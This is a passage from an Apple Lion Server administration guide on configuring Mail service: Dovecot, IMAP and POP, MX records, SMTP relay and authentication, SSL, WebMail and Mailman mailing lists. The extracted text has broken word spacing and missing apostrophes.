Dovecot us es the configuration files /etc/dovecot/dovecot.conf and /etc/dovecot/conf.d/*. Server Admin uses the files in /etc/dovecot/default/. Dovecot logs its events in /var/log/mailacces s.log. The Dovecot mail store is located in /Library/Server/Mail/Data/mail/. The Dovecot delivery application receives mail from the Pos tfix delivery agent and stores the mail in user spool files in /Library/Server/Mail/Data/mail/GUID where GUID is the Globally Unique ID (GUID) of the mail user. The user can then use IMAP or POP to retrieve mes sages. After receiving mail from external MTAs, you can apply virus filtering or junk mail filtering to the mess ages . Mac OS X Lion uses ClamAV and Spam Ass ass in for these tasks. Internet Message Access Protocol (IMAP) IMAP is the s olution for people who us e more than one computer to receive mail. IMAP is a client-server mail protocol that allows users to acces s mail from anywhere on the Internet. With IMAP, a users mail is delivered to the server and stored in a remote mailbox on the server. To users , mail appears as if it were on the local computer. A key difference between IMAP and POP is that with IMAP the mail isnt removed from the s erver until the us er deletes it. The IMAP users computer can ask the server for message headers, ask for the bodies of specified messages, or s earch for mess ages that meet certain criteria. These messages are downloaded as the user opens them. IMAP connections are persistent and remain open, maintaining a load on the server and poss ibly the network as well. Post Office Protocol (POP) POP is used only for receiving mail, not for sending mail. The POP s ervice is like a post office, s toring mail and delivering it to a specific address . Mail s ervice stores incoming POP mail until us ers connect to Mail service and download their waiting mail. After a us ers computer downloads POP mail, the mail is stored only on the users computer. The users computer disconnects from Mail s ervice, and the user can read, organize, and reply to the received POP mail. An advantage of using POP is that your server doesnt need to store mail that users have downloaded. Therefore, your server doesnt need as much storage s pace as it would us ing IMAP. However, because the mail is removed from the server, if the users computer s ustains damage and loses mail files, theres no way to recover these files without us ing data backups. Another advantage of POP is that POP connections are transitory. After mail is trans ferred, the connection is dropped and the load on the network and mail server is removed. POP isnt the best choice for users who access mail from more than one computer, such as a home computer, an office computer, and a laptop while on the road. When a user retrieves mail via POP, the mail is downloaded to the users computer and is usually removed from the server. If the user logs in later from a different computer, the user cant s ee previously downloaded mail.
RELATED INFORMATION
Mail s creening
Mail
User interaction with Mail service

Mail is delivered to its final recipient using a mail user agent (MUA). MUAs are usually referred to as mail clients or mail applications. These mail clients often run on the users local computer. Each users mail application must be configured to send mess ages to the outgoing server and receive messages from the incoming s erver. These configurations can affect your servers processing load and available storage space. Users can also access mail through Webmail.
Mail
Use network services with Mail service

Mail s ervice makes use of network s ervices to ensure delivery of mail.
Before sending mail, your Mail service will probably have a DNS service determine the Internet Protocol (IP) address of the des tination. The DNS s ervice is necess ary because people typically addres s their outgoing mail by using a domain name, s uch as example.com, rather than an IP address, such as 198.162.12.12. To send an outgoing message, Mail service must know the IP address of the destination. Mail service relies on a DNS s ervice to look up domain names and determine the corresponding IP addresses . The DNS service can be provided by your ISP or by Lion Server. Additionally, a mail exchange (MX) record can provide redundancy by listing an alternate mail host for a domain. If the primary mail hos t isnt available, the mail can be sent to the alternate mail hos t. An MX record can list several mail hos ts , each with a priority number. If the lowest priority hos t is bus y, mail can be sent to the host with the next lowest priority, and so on. Without a properly configured MX record in DNS, mail might not reach your intended server. How Mail service uses DNS The s ending s erver reads the mail recipients domain name (what comes after the @ in the To address). The s ending s erver looks up the MX record for that domain name to find the receiving s erver. If the MX record is found, the mess age is sent to the receiving s erver. If the lookup fails to find an MX record for the domain name, the s ending server ass umes that the receiving s erver has the same name as the domain name, s o the sending server does an Address (A) lookup on that domain name and attempts to send the file there.
Mail
Mail serv ice setup
Before you set up Mail service

Before setting up Mail s ervice for the firs t time, complete the following. If you are upgrading from a previous version of Mac OS X Server, you might need to take special steps to upgrade Mail service. Decide whether to use POP, IMAP, or both for accessing mail. If your server provides Mail service over the Internet, obtain a registered domain name. Determine whether your ISP will create your MX records or whether youll create them using your own DNS service. Identify the people who will use Mail s ervice but who dont have user accounts in a directory domain accessible to Mail service. Then create user accounts for these mail users. Determine your authentication and transport security needs .
RELATED INFORMATION
Use network s ervices with Mail s ervice Provide SMTP authentication Provide IMAP and POP authentication Secure Mail service with SSL
Mail
Mail serv ice setup
Mail service management tools

Lion Server provides two primary applications and one primary command-line tool to help you set up and manage Mail service. Server Admin: Use to start, stop, configure, maintain, and monitor Mail service when you install Lion Server. Server app:Us e to create user accounts for mail users and configure each users mail options. serveradmin: Use to manage Mail s ervice from the command-line remotely via ssh or locally through the Terminal application.
Mail
Mail serv ice setup
Configure DNS for Mail service
Configuring DNS for Mail service entails enabling MX records with your DNS s erver. If you have an ISP that provides DNS service, contact the ISP so they can enable your MX records. Follow these s teps if you provide your own DNS service using Lion Server.
1. In Server Admin, choose a server, then s elect DNS. 2. Click the Zones button in the toolbar. 3. Select the zone that the MX record will be added to. 4. If there are no zones , create one. 5. If the mail s erver does not have a machine record (A), add one. 6. Click the + button in the Mail Exchangers list. 7. Enter the mail servers hostname. 8. Set a mail server precedence number. Mail s ervers try to deliver mail at lower numbered mail servers firs t. 9. Click OK to Save. To set up multiple s ervers for redundancy, add MX records with different precedence numbers .
Mail
Mail serv ice setup
Automatic configuration of Mail service

You can have Mail s ervice set up and start as part of the Lion Server installation proces s. An option for setting up Mail service appears in the Setup Ass is tant application, which runs at the conclusion of the installation process. If you s elect this option, Mail service is set up as follows : SMTP, POP, and IMAP are active and us e standard ports. Junk mail filter is on. Virus filtering is on. Quotas are not enforced. Incoming mes sages larger than 10 MB are refus ed. Mailing lists are inactive. Standard authentication methods are used (not Kerberos), with POP and IMAP set for clear-text pas swords (APOP and CRAMMD5 turned off) and SMTP authentication turned off. If your s erver is an Open Directory master, Kerberos, CRAM-MD5, and APOP are us ed. Mail is delivered only locally. (No mail is s ent over the Internet.) Mail relay is unres tricted. You can also use the configuration as sistant to s et up Mail service. This interactive ass is tant helps you s elect options and settings. If you use the configuration assistant, you s hould already have MX records s et properly. After using the ass is tant, you can use Server Admin, Server app, and the serveradmin command-line tool to cus tomize your configuration.
Mail
Mail serv ice setup
Enable Mail service administration with Server Admin

You mus t turn on Mail s ervice adminis tration before you can use Server Admin to configure or enable it. This allows Server Admin to s tart, s top, and change s ettings for Mail s ervice.
1. Open Server Admin.
2. Select a s erver, click the Settings button in the toolbar, and then click the Services tab. 3. Select the checkbox for Mail s ervice. You can now configure and control Mail service using Server Admin.
Mail
Mail serv ice configuration
Configure outgoing Mail service

Mail s ervice includes an SMTP service for s ending mail. Subject to restrictions that you control, the SMTP service also transfers mail to and from Mail service on other servers. If your mail users send messages to another Internet domain, your SMTP service delivers the outgoing mess ages to the other domains Mail service. Other Mail services deliver mes sages for your mail users to your SMTP service, which then trans fers the mes sages to your POP service and IMAP service. If you dont choose a method of SMTP authentication or authorized specific SMTP servers to relay for, the SMTP server allow anonymous SMTP mail relay and is considered an open relay. Open relays are bad because junk mail senders can exploit the relay to hide their identities and send illegal junk mail without penalty. There is a difference between relaying mail and accepting delivery of mail. Relaying mail means passing mail from one (possibly external) mail server or a local users mail client to another (third) mail server. Accepting delivery means receiving mail from a (poss ibly external) mail server to be delivered to the servers mail users. Mail addressed to local recipients is still accepted and delivered. Enabling authentication for SMTP requires authentication from any selected authentication method prior to relaying mail. SMTP authentication is used with restricted SMTP mail transfer to limit junk mail propagation. Enable SMTP access SMTP is used for transferring mail between Mail service and sending mail from users mail clients. The SMTP Mail service stores outgoing mail in a queue until it has found the mail exchange server at the mails destination. Then it transfers the mail to the des tination s erver for handling and eventual delivery. SMTP service is required for outgoing Mail service and for accepting delivery of mail from mail servers outs ide your organization. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the General tab. 4. Click Enable SMTP. 5. Select Allow incoming mail, if wanted. 6. If you allow incoming mail, enter the domain name to accept mail for and the mail servers hos t name. 7. Click Save. By default SMTP is enabled on port 25. If port 25 is blocked in your environment, change the port that SMTP uses . Require SMTP authentication If your Mail service requires SMTP authentication, your server cannot be us ed as an open relay by anonymous users . Someone who wants to us e your server as a relay point must first provide the name and pass word of a us er account on your server. Although SMTP authentication applies primarily to mail relay, your local mail users must also authenticate before sending mail. This means your mail users must have mail client software that supports SMTP authentication or they cant send mail to remote servers . Mail s ent from external mail s ervers and address ed to local recipients is still accepted and delivered. Relaying outgoing mail through another server Rather than delivering outgoing mail to its destinations, your SMTP Mail service can relay outgoing mail to another s erver. Normally, when an SMTP s erver receives a message addressed to a remote recipient, it attempts to send that message to that server or the server specified in the MX record, if it exists . Depending on your network s etup, this method of mail transport might not
be wanted or even possible. You might then need to relay outbound mess ages through a specific s erver. You might need to use this method to deliver outgoing mail through the firewall set up by your organization. In this cas e, your organization must designate a server for relaying mail through the firewall. This method can be useful if your server has slow or intermittent connections to the Internet. Do not attempt to relay mail through a mail server outs ide your organizations control without the relay administrators permission. Trying to do so will label you as a Mail service abuser. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the General tab. 4. Click Relay outgoing mail through host and enter the DNS name or IP address of the server that provides SMTP relay. 5. Click Save. Saving mail messages for monitoring and archival purposes You can configure Mail service to s end a blind carbon copy (Bcc) of each incoming or outgoing mes sage to a us er or group. You might want to do this to monitor or archive mes sages. Senders and receivers of mail dont know that copies of their mail are being archived. You can set up the us er or group to receive Bccs using POP, then set up a client mail application to log in periodically and clean out the account by retrieving all new messages . Otherwise, you might want to periodically copy and archive the messages from the des tination directory using automated s hell commands. You can set up filters in the mail client to highlight types of messages. Additionally, you can archive all mes sages for legal reasons. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the General tab. 4. Click the Copy all mail to checkbox and enter a us er or group name. 5. Click Save.
RELATED INFORMATION
Provide SMTP authentication Secure Mail service with SSL
Mail
Restrict outgoing mail

You can restrict outgoing mail by only relaying through approved hosts to relay mail, rejecting other specifc hosts or blacklisted hos ts , or filtering your SMTP connections. Restricting SMTP relay Your Mail s ervice can restrict SMTP relay by allowing only approved hosts to relay mail. You create the list of approved servers. Approved hosts can relay through Mail s ervice without authenticating. Servers not on the list cannot relay mail through Mail service unles s they authenticate first. All hosts, approved or not, can deliver mail to your local mail users without authenticating. Mail service can log connection attempts made by hosts not on your approved lis t. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Relay tab. 4. Click the Accept SMTP relays only from these hosts and networks checkbox. 5. Edit the list of hosts by choosing one of the following:
Click the Add button (+) to add a host to the lis t. Click the Remove button (-) to delete the s elected host on the list. Click the Edit button (/) to change a host on the list. When adding to the lis t, Server Admin accepts a variety of notations. You can: Enter a single IP address or the network/netmask pattern, such as 192.168.40.0/21. Enter a hos t name, such as mail.example.com. Enter an Internet domain name, such as example.com. The following table describes the results of using restricted SMTP relay and SMTP authentication in various combinations.
SMTP requires authentication On Restricted SMTP relay Off Result All mail servers must authenticate before Mail service accepts mail for relay. Your local mail users must also authenticate to send mail out. On On Approved mail servers can relay without authentication. Servers you havent approved can relay after authenticating with Mail service. Off On Mail service cant be used for open relay. Approved mail servers can relay (without authenticating). Servers that you havent approved cant relay unless they authenticate, but they can deliver to your local mail users. Your local mail users dont need to authenticate to send mail. This is the most common configuration.
Rejecting SMTP connections from specific servers Mail s ervice can reject unauthorized SMTP connections from hosts on a disapproved hosts lis t that you create. Mail from hosts on this list is denied and the SMTP connections are clos ed after posting a 554 SMTP connection refused error. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Relay tab. 4. Click the Refuse all messages from thes e hos ts and networks checkbox. 5. Edit the list of hosts by choosing one of the following: Click the Add button (+) to add a host to the lis t. Click the Remove button (-) to delete a host on the lis t. Click the Edit button (/) to change a host on the list. When adding to the lis t, Server Admin accepts a variety of notations. You can: Enter a single IP address or the network/netmask pattern, such as 192.168.40.0/21. Enter a hos t name, such as mail.example.com. Enter an Internet domain name, such as example.com. Rejecting mail from blacklisted senders Mail s ervice can reject mail from SMTP servers that are blacklis ted as open relays by a Real-time Blacklist (RBL) Server. Mail service uses an RBL server that you s pecify. RBLs are s ometimes called b lack -hole servers. Blocking uns olicited mail from blacklisted s enders might not be completely accurate. Sometimes it prevents valid mail from being received.
1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Relay tab. 4. Click the Use these junk mail rejection servers checkbox. 5. Edit the list of s ervers by adding the DNS name of an RBL server: Click the Add button (+) to add a server to the lis t, then enter the domain name of a RBL s erver, s uch as rbl.example.com. Click the Remove button (-) to delete the s erver from the list. Click the Edit button (/) to change the s erver. When adding to the lis t, Server Admin accepts a variety of notations. You can: Enter a single IP address or the network/netmask pattern, such as 192.168.40.0/21. Enter a hos t name, such as mail.example.com. Enter an Internet domain name, such as example.com. Filtering SMTP connections You can us e Lion Server Firewall service to allow or deny acces s to your SMTP Mail s ervice from s pecific IP address es. Filtering disallows communication between an originating host and your mail server. Mail service does nt receive the incoming connection and no SMTP error is generated or sent back to the client. 1. In Server Admin, select Firewall in the Computers & Services pane. 2. Create a firewall IP filter using the instructions in Network Services Administration, us ing the following s ettings: Acces s: denied Port number :25 (or your incoming SMTP port, if you us e a nonstandard port) Protocol: TCP Source: the IP address or address range you want to block Des tination: your mail servers IP address 3. If you want, log the packets to monitor the SMTP abuse. 4. Add more filters for the SMTP port to allow or deny acces s from other IP address es or address ranges.
Mail
Provide SMTP authentication

You can protect your s erver from being an open relay (which indis criminately relays mail to other mail s ervers) by requiring SMTP authentication. Requiring authentication ens ures that only known users people with user accounts on your servercan send mail from your mail servers. You can configure Mail service to require secure authentication using CRAM-MD5, Kerberos, or less secure authentication methods using plain text or login. Plain authentication s ends mail pas swords as plain text over the network. Login authentication sends a minimally s ecure crypt has h of the password over the network. You might allow these less secure authentication methods , which dont encrypt pas swords, if some users have mail client software that doesnt support secure methods. If you configure Mail service to require CRAM-MD5, mail users accounts must be set to use a pas sword server that has CRAMMD5 enabled. Before enabling Kerberos authentication for incoming Mail service, you mus t integrate Mac OS X with a Kerberos server. If youre using Lion Server for Kerberos authentication, this is already done for you. Enabling SMTP authentication will:
Make your users authenticate with their mail client before accepting mail to send. Frustrate mail server abusers who are trying to s end mail through your s ystem without your consent. Enabling multiple methods allows a client to use any of the enabled methods . To require any of these authentication methods, enable only one method. To allow secure SMTP authentication 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Advanced tab. 4. Select Security. 5. Click the CRAM-MD5 or Kerberos checkbox in the SMTP section. 6. Click Save. To allow less secure authentication 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Advanced tab. 4. Select Security. 5. In the SMTP section, click the Plain or Login checkbox. 6. Click Save. If you use the Server Setup Ass istant and make your server an Open Directory Master, Kerberos and CRAM-MD5 are enabled. To force only one method to be us ed for authentication, des elect the one you do not want us ed.
Mail
Configure incoming Mail service

When configuring incoming Mail service, you configure mail to be retrieved by users and mail client applications. Configuring incoming Mail service involves these basic steps : Choose and enable the type of access (POP, IMAP, or both). Choose a method for authentication of the mail client. Choose a policy for secure trans port of mail data over SSL. The following sections explain how to enable IMAP and POP acces s. Enable IMAP access IMAP is a client-server mail protocol that allows users to access mail from the Internet. With IMAP, mail is delivered to the server and s tored in a remote mailbox on the s erver. To users, mail appears as if it were on the local computer. A key difference between IMAP and POP is that with IMAP the mail isnt removed from the s erver until the user deletes it. IMAP connections are persistent and remain open, maintaining load on the server and poss ibly the network as well. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the General tab. 4. Click Enable IMAP. 5. Enter the number of concurrent connections you want to allow, then click Save. 6. Click Save.
7. Continue and configure security for IMAP authentication and trans port. Enable POP access POP is used for receiving mail. The POP Mail s ervice stores incoming POP mail until users have their computers connect to Mail service and download their waiting mail. After a users computer downloads POP mail, the mail is s tored only on the us ers computer. An advantage of using POP is that your server doesnt need to store mail that users have downloaded. POP isnt the best choice for users who access mail from more than one computer, such as a home computer, an office computer, and a laptop while on the road because after messages are acces sed by one computer, they are deleted from the s erver. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the General tab. 4. Click Enable POP. 5. Click Save. 6. Continue and configure security for IMAP authentication and trans port. Choose no incoming mail retrieval You can choos e SMTP Mail s ervice but not supply POP or IMAP service for incoming mail retrieval. If neither POP nor IMAP is enabled, incoming mail from other mail s ervers is still delivered to users but they cant access their mail with their mail client applications. Mail accepted for local delivery is queued until POP or IMAP services are enabled, delivery to /var/mail/ is enabled, or the message expires and a Non Delivery Receipt (NDR) is sent to the sender (after 72 hours by default). If delivery to /var/mail/ is enabled, us ers can s till acces s mail using UNIX mail tools s uch as PINE or ELM. Mes sages delivered to /var/mail/ are not available for delivery to users with Dovecot if POP or IMAP are enabled again. If POP and IMAP are dis abled, you can change where incoming mail is s tored from its default location at /Library/Server/Mail/Data/mail/GUID to /var/mail/username. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the General tab. 4. Click the Deliver to /var/mail/ checkbox. 5. Click Save. Save mail messages for monitoring and archival purposes You can configure Mail service to s end a blind carbon copy (Bcc) of each incoming or outgoing mes sage to a us er or group. You might want to do this to monitor or archive mes sages. Senders and receivers of mail dont know that copies of their mail are being archived. You can set up the us er or group to receive Bccs using POP, then set up a client mail application to log in periodically and clean out the account by retrieving all new messages . Otherwise, you might want to periodically copy and archive the messages from the des tination directory using automated s hell commands. You can set up filters in the mail client to highlight types of messages. Additionally, you can archive all mes sages for legal reasons. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the General tab. 4. Click the Copy all mail to checkbox and enter a us er or group name. 5. Click Save.
RELATED INFORMATION
Provide IMAP and POP authentication Secure Mail service with SSL
Mail
Provide IMAP and POP authentication

Your IMAP/POP Mail s ervice (Dovecot) can protect us er passwords by requiring that connections use a secure authentication using Kerberos , CRAM-MD5 (for IMAP), or APOP (for POP) or les s secure authentication methods us ing plain text or login. When a us er connects with s ecure authentication, the users mail client software encrypts the users pas sword before sending it to your IMAP service. Plain authentication s ends mail pas swords as plain text over the network. Login authentication sends a minimally s ecure crypt has h of the password over the network. You might allow these less secure authentication methods, which dont encrypt pas swords, if some users have mail client software that doesnt support the secure methods. Make sure your us ers mail applications and user accounts s upport the method of authentication you choose. If you configure Mail service to require CRAM-MD5, you must s et mail accounts to use a Lion Server Pass word Server that has CRAM-MD5 enabled. Before enabling Kerberos authentication for incoming Mail service, you mus t integrate Mac OS X with a Kerberos server. If youre using Lion Server for Kerberos authentication, this is already done for you. Enabling SMTP Authentication will: Make your users authenticate with their mail client before accepting mail to send. Frustrate mail server abusers who are trying to s end mail through your s ystem without your consent. Enabling multiple methods allows a client to use any of the enabled methods . To require any of these authentication methods, enable only one method. To set secure IMAP and POP authentication 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Advanced tab. 4. Select Security. 5. Select CRAM-MD5 or Kerberos (as needed) in the IMAP section. 6. Click Save. To set less secure IMAP and POP authentication 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Advanced tab. 4. Select Security. 5. Click the Login, PLAIN, or Clear checkbox in the IMAP list. 6. Click Save. If you use the Server Setup Ass istant and make your server and Open Directory Master, Kerberos, CRAM-MD5 (for IMAP), and APOP (for POP) are enabled. To force only one method to be used for authentication, deselect the one you do not want used.
Mail
Secure Mail service with SSL

Secure Sockets Layer (SSL) connections ens ure that the data s ent between your mail server and your us ers mail clients is encrypted. This allows secure and confidential trans port of mail mes sages acros s a local network. SSL transport doesnt provide secure authentication. It only provides secure trans fer from your mail server to your clients. For incoming mail, Mail service s upports secure mail connections with mail client s oftware that requests them. If a mail client requests an SSL connection, Mail service can comply if that option is enabled. Mail s ervice still provides non-SSL (unencrypted) connections to clients that dont reques t SSL. The configuration of each mail client determines whether it connects with SSL or not. For outgoing mail, Mail service supports secure mail connections between SMTP s ervers. If an SMTP s erver reques ts an SSL connection, Mail s ervice can comply if that option is enabled. Mail s ervice can still allow non-SSL (unencrypted) connections to mail servers that dont request SSL. Configure SSL transport If Mail s ervice is started from the Server app, the default self-s igned certificate is used for SSL transport. You can change this to another certificate if needed. 1. Select your server in the Hardware section of the Server app sidebar. 2. Select the Settings pane. 3. Click the Edit button next to SSL Certificate. 4. Choose the certificate for the SMTP or Pop and IMAP server as needed.
RELATED INFORMATION
Replace certificates Create a self-s igned certificate Import a certificate identity Obtain a CAs igned certificate Use an SSL certificate
Mail
Change Mail service settings from the command line

Most settings are expos ed in Server Admin and can be changed there. Many s ettings can also be access ed through the serveradmin command-line tool. Find the name of the setting to change and then submit your setting as an argument to s erveradmin. For example, to disable POP email service: $ sudo serveradmin settings mail:imap:enable_pop = no $ sudo serveradmin stop mail $ sudo serveradmin start mail If you make a change, you may need to stop and restart Mail s ervice. For more s pecific configuration of Pos tfix and Dovecot you might want to configure them directly. For information about configuring thes e tools , see the following: For Pos tfix, see www.pos tfix.org; for Dovecot IMAP/POP, see www.dovecot.org.
Mail
Enable Webmail
WebMail is a web-based mail user agent (MUA). It allows a web brows er such as Apples Safari to compose, read, and forward mail like any other mail client. Lion Servers WebMail functionality is provided by a s oftware package called Roundcube at roundcube.net. WebMail relies on your mail server to provide the Mail service. WebMail cannot provide Mail s ervice independent of the mail server. WebMail uses the Mail service of your Lion Server computer.
WebMail uses standard mail protocols and requires your mail server to support them. These protocols are: IMAP, for retrieving incoming mail SMTP, for exchanging mail with other mail servers (sending outgoing mail and receiving incoming mail) WebMail doesnt support retrieving incoming mail via POP. Even if your mail s erver has POP enabled, WebMail doesnt use it.
1. Enable and configure your mail s erver. 2. Launch Server App from the Launchpad. 3. In the Server app s idebar, s elect Mail 4. Check Enable WebMail.
Mail
Set up a Mailman mailing list

To set up a Mailman mailing list, you enable the service, define a list name, and add subscribers to the list. When you create a mailing list, you mus t specify a master pass word that gives you control over all lists. Do not use an administrators or users login pass word. You must also specify the mail addresses of other adminis trators who need the master pas sword. Enable mailing lists Before you can define mailing lis ts and subscribers, you mus t enable the list service and create the adminis trators default mailing list. When you enable mailing lists, you also create a password that allows adminis tration of all lis ts on the s erver and a special list for mailing list adminis trators. Mailing list adminis trators get a copy of the master list password and error notifications. Note: This list (called Mailman) mus t exis t for mailing lis ts to function. Do not remove the master list. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Mailing Lists tab. 4. Click Enable Mailman Mailing Lis ts . 5. Enter the master list pass word. 6. Enter the mail addresses of the list adminis trators, then click OK. You must enter at least one administrator who will receive notifications about the mailing list service. 7. Click Save. The Mailman list is created and the master pas sword is s ent to the indicated administrators . Create a mailing list Mailing lists distribute a s ingle mail message to multiple recipients. After you create a mailing list, mail s ent to the lists address is sent to all subscribers. Mailing lists have list administrators who can change lis t membership and lis t features. Lists can be self-subscribing, so list adminis trators dont need to add and remove subscribers. The subscribers can do so themselves. Note: Mailing lists cannot be renamed or corrected after creation. This is a limitation of Mailman, the list s oftware us ed by Lion Server. Although you can change the case of a list name using Mailmans web interface, Server Admin doesnt allow changing the list name in any way. To rename or correct a list name, you must create a list and add exis ting users to the new list. This results in a Welcome message being s ent to all listed users.
1. In Server Admin, select a computer in the Servers list, then s elect Mail.
2. Click Settings. 3. Select the Mailing Lists tab. 4. Under the Lists pane, click the Add button (+). 5. Enter the lists name. The list name is the mail account name that mailing list users s end their mail to. The name isnt case s ensitive and cannot contain spaces. 6. Enter the list administrators mail address , then click Edit. If you only enter a name, it mus t be a username on the s erver. If you enter us ername@domain, the administrator doesnt need to be a local user. 7. Click Users May Self Subscribe, if desired. 8. Choose the default language for the list. You can choos e English, French, German, Japanese, Korean, Russian, or Spanish. This s etting encodes the text generated by the list for the default language. 9. Choose additional languages to be supported by the list. This s etting also encodes the text generated by the list for the default language. 10. Click OK. 11. Click Save. You can now add subscribers to the list. If you allow users to self-s ubs cribe, they can s ubscribe using mail or the web administration page. Set a list's maximum message length a mailing list You can set the maximum size message that the list accepts. You can disallow large attachments by setting a s mall maximum size, or you can allow file collaboration by setting an unlimited mes sage size. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Mailing Lists tab. 4. Select the list whose mes sage length you want to set. 5. Under the Lists pane, click the Edit button (/). 6. Enter the maximum mess age length (in KB). If you enter 0, the maximum length is unlimited. 7. Click OK. 8. Choose the default language for the list. You can choos e English, French, German, Japanese, Korean, Russian, or Spanish. This s etting encodes the text generated by the list for the default language. 9. Choose additional languages to be supported by the list. This s etting also encodes the text generated by the list for the default language. 10. Click OK. 11. Click Save. Create a mailing list description You use the web interface to set the mailing list description. Web services must be enabled to access the web-based interface. Sometimes its difficult to know the scope and subject matter of a mailing list from the short list name. The list information page contains a des cription of the list, the s ubject matter it covers , and (optionally) who is permitted to subscribe. These details are especially good for self-subs cription lists. A potential subscriber can decide whether to s ubscribe based on the lists des cription.
1. In a web brows er, enter the URL of the list administration page. This is us ually server.domain.tld/mailman/admin/listname . 2. Enter the master list pass word and click Let me in. This is not the users login pas sword. The mas ter lis t password was s et when mailing lists were enabled on the server. It was mailed to lis t administrators designated at that time. 3. Make sure that General Options is selected from the Configuration Categories link section. 4. Enter a short phrase in the des cription text box. 5. In the info text box, enter information about the list, its rules , and its content expectations. 6. Click Submit Your Changes . Customize the mailing list welcome message You use the web interface to set the mailing list welcome mess age. Web services must be enabled to access the web interface. When subscribers join a mailing list, by assignment or self-subs cription, they receive an automated welcome message. The mess age explains where to find the list archives and how to unsubscribe. You can cus tomize it by adding text, describing the list culture and rules, or including other information for the s ubscribers . 1. In a web brows er, enter the URL of the list administration page. This is us ually server.domain.tld/mailman/admin/listname . 2. Enter the master list pass word. This is not the users login pas sword. The mas ter lis t password was s et when mailing lists were enabled on the server. It was mailed to lis t administrators designated at that time. 3. Make sure that General Options is selected from the Configuration Categories link section. 4. Enable Send welcome message to newly subscribed members. 5. Enter the text to include in the List-specific text prepended text box. 6. Click Submit Your Changes . Customize the mailing list unsubscribe message You use the web interface to set the mailing list unsubscribe mess age. Web services must be enabled to access the web interface. When a us er is unsubs cribed from a mailing list, by the list administrator or by unsubs cribing, the user receives an automated uns ubscribe message. The mess age confirms the unsubs cribing. You can customize it by adding information you want users to have upon leaving the list. 1. In a web brows er, enter the URL of the list administration page. This is us ually server.domain.tld/mailman/admin/listname . 2. Enter the master list pass word and click Let me in. This is not the users login pas sword. The mas ter lis t password was s et when mailing lists were enabled on the server. It was mailed to lis t administrators designated at that time. 3. Make sure that General Options is selected from the Configuration Categories link section. 4. Enable Send goodbye mess age to members. 5. Enter the text to include in the Text sent to people leaving the lis t text box. 6. Click Submit Your Changes . Enable a mailing list moderator You use the web interface to set mailing list moderation. Web s ervices must be enabled to access the web interface. You can create a moderated list where the posts must be approved by a list administrator before the pos t is sent. You designate list moderators who have limited adminis trative privileges . They cant change list options but they can approve or reject subscription reques ts and pos tings.
When moderators enter their pass word in the list adminis tration page, they get a page with their own moderating tasks available. 1. In a web brows er, enter the URL of the list administration page. This is us ually server.domain.tld/mailman/admin/listname . 2. Enter the master list pass word. This is not the users login pas sword. The mas ter lis t password was s et when mailing lists were enabled on the server. It was mailed to lis t administrators designated at that time. 3. Make sure that General Options is selected from the Configuration Categories link section. 4. Enter the list moderator addres ses to include in the The list moderator mail address es text box. 5. Click Submit Your Changes . 6. In the Configuration Categories link section, s elect Pass word Options. 7. Enter a pas sword in the moderator password field and confirm it. 8. Click Submit Your Changes . Set mailing list bounce options You use the web interface to set mailing list bounce options . Web services mus t be enabled to acces s the web interface. When a list mes sage bounces and returns to the list server, you can choose how the list s erver handles the resulting bounce mess age. 1. In a web brows er, enter the URL of the list administration page. This is us ually server.domain.tld/mailman/admin/listname . 2. Enter the master list pass word. This is not the users login pas sword. The mas ter lis t password was s et when mailing lists were enabled on the server. It was mailed to lis t administrators designated at that time. 3. In the Configuration Categories link section, s elect Bounce Processing. 4. Select bounce processing options. Each option section has a link to a help page that explains the option s etting. 5. Click Submit Your Changes . Designate a mailing list as private You use the web-based interface to set a lists privacy options. Web services must be enabled to access the web-based interface. You might not want to show some lists on the web list access page. To designate a lis t as private s o it is nt shown, see server.domain.tld/mailman/listinfo. 1. In a web brows er, enter the URL of the list administration page. This is us ually server.domain.tld/mailman/admin/listname . 2. Enter the master list pass word. This is not the users login pas sword. The mas ter lis t password was s et when mailing lists were enabled on the server. It was mailed to lis t administrators designated at that time. 3. In the Configuration Categories link section, s elect Bounce Processing. 4. Select bounce processing options. Each option has a link to a help page that explains the option. 5. Click Submit Your Changes . Add subscribers Use Server Admin to add mailing lis t subscribers to a list. Mailing list s ubscribers do not need an account (mail or file access) on the lists server. Any mail addres s can be added to the list. You must have an existing list to add a s ubs criber.
1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Mailing Lists tab. 4. Select the list to add a s ubs criber to. 5. Under the Members pane, click the Add button (+). 6. Enter the recipients mail address. If youre entering multiple subscribers, enter the recipient mail address es or drop a text list into the User Identifiers box. If the subscribers are users on the mail server, you can us e the Users and Groups button to add local groups to the list. 7. Choose from the following subscriber privileges: Users sub scrib ed to list: This means the us er will receive mail sent to the list address. Users may post to list: This means the list will accept mail from the user. Users can administer list: This means the user has administrative privileges for the list. 8. Click OK.
Mail
Mail service filtering

